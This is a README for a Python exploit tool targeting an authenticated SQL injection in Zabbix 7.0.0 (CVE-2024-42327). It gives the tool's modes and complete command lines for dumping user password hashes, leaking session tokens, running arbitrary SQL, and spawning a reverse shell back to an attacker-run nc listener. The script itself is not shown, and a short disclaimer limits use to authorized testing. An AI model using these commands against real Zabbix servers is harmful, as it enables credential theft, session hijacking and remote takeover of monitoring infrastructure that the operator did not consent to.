Exploit for CVE-2024-42327

## https://sploitus.com/exploit?id=285C1AC6-89F8-5698-9A39-0738786ADA57
# 🛡️ Zabbix 7.0.0 SQL Injection Exploit Script

A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.

> ⚠️ **DISCLAIMER:**  
> This script is for **educational** and **authorized penetration testing** purposes only.  
> Do **not** use it on systems you do not own or have explicit permission to test.  
> The author is not responsible for any misuse or damage caused by this tool.

---

## ✨ Features

- ✅ Authenticated SQL Injection against Zabbix 7.0.0
- 🧑‍💻 Dump user hashes from the DB
- 🔐 Leak session tokens
- 🐚 Remote code execution via reverse shell (admin token required)
- 🧠 Run custom SQL queries

---

## 🔧 Requirements

- Python 3.6+
- `requests` library

Install requirements if needed:

```bash
pip install requests
```

## 🚀 Usage

```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```


## 🔘 Available Modes

| Mode	| Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users |	Dumps all user IDs, usernames, password hashes, and roles |	❌ |
| leak-tokens | Dumps all active session IDs from the database | ❌ |
| rce | Spawns a reverse shell via item.create exploit |  ✅ |
| custom | Run any custom SQL query via the injection | ❌ |		


## 🧪 Examples
Dump User Hashes

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```

Leak Session Tokens

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```

Remote Code Execution (Reverse Shell)

```bash
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```

Custom SQL Injection

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```

## 📁 Project Structure

```bash
sqliZabbix.py      # Main exploit script
README.md          # This documentation
```
## 🧑‍💻 Author

Anthony (@874anthony)

Crafted with love & curiosity 🐍

## 🔐 License
This project is released under the MIT License. Please use responsibly.